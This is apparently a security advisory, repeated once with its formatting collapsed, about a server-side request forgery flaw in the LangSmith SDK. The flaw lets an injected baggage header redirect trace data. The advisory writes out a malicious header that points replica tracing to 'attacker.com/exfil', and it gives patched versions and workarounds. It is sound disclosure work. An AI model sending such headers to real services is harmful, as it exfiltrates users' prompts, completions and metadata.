Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
Description
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attack Vector
-
Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:
baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
-
The service parses the header via RunTree.from_headers(), storing the attacker's URL
-
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use
TracingMiddleware to automatically propagate tracing context
- Call
RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python:
pip install langsmith>=0.6.3
- JavaScript:
npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
Workarounds
If unable to upgrade immediately:
- Strip or validate the
baggage header before passing to from_headers()
- Do not use
TracingMiddleware with untrusted traffic
References
Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary
api_urlvalues through thebaggageheader, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.Description
When using distributed tracing, the SDK parses incoming HTTP headers via
RunTree.from_headers()in Python orRunTree.fromHeaders()in Typescript. Thebaggageheader can contain replica configurations includingapi_urlandapi_keyfields.Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's
post()andpatch()methods send run data to all configured replica URLs, including any injected by an attacker.Attack Vector
Attacker sends an HTTP request to a vulnerable service with a malicious
baggageheader:The service parses the header via
RunTree.from_headers(), storing the attacker's URLWhen the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to
https://attacker.com/exfilImpact
Affected Use Cases
Applications are vulnerable if they:
TracingMiddlewareto automatically propagate tracing contextRunTree.from_headers()/RunTree.fromHeaders()with untrusted HTTP headersRemediation
Update to the patched versions:
pip install langsmith>=0.6.3npm install langsmith@>=0.4.6The fix filters incoming replica configurations to an allowlist of safe fields, removing
api_url,api_key, and other credential fields.Workarounds
If unable to upgrade immediately:
baggageheader before passing tofrom_headers()TracingMiddlewarewith untrusted trafficReferences